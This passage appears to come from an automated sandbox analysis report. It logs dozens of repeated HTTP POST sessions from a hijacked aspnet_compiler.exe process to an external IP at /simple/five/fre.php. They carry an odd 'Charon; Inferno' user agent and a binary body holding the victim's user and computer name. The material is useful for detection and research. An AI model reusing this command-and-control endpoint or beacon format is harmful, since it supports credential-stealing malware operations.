                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:06.033854961 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:05 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.44980894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:06.194040060 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:06.199202061 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:07.183650017 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:07 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.44981394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:07.364787102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:07.370279074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:08.327786922 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:08 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.44981894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:08.474978924 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:08.480132103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:09.442281008 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:09 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.44982594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:09.754107952 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:09.759212971 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:10.714437962 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.44983294.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:10.864219904 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:10.869167089 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:11.828722000 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:11 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.44983694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:11.997169971 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:12.002434015 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:12.948380947 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:12 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.44984194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:13.099525928 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:13.104631901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:14.079732895 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:13 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.44984994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:14.231035948 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:14.236002922 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:15.183604956 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:15 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.44985594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:15.343772888 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:15.349390984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:16.283584118 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:16 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.44986094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:16.428797960 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:16.433712959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:17.363177061 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:17 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.44986594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:17.533133030 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:17.538065910 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:18.468389988 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:18 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.44986994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:18.628218889 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:18.633126020 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:19.607048988 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:19 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.44987594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:19.760445118 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:19.765315056 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:20.770309925 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:20 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                47192.168.2.44987994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:20.933852911 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:20.938966990 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:21.913968086 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:21 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                48192.168.2.44988494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:22.070224047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:22.075165033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:23.029581070 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:22 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                49192.168.2.44988894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:23.178268909 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:23.183307886 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:24.542594910 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:24 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                50192.168.2.44989594.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:24.801156044 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:24.806145906 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
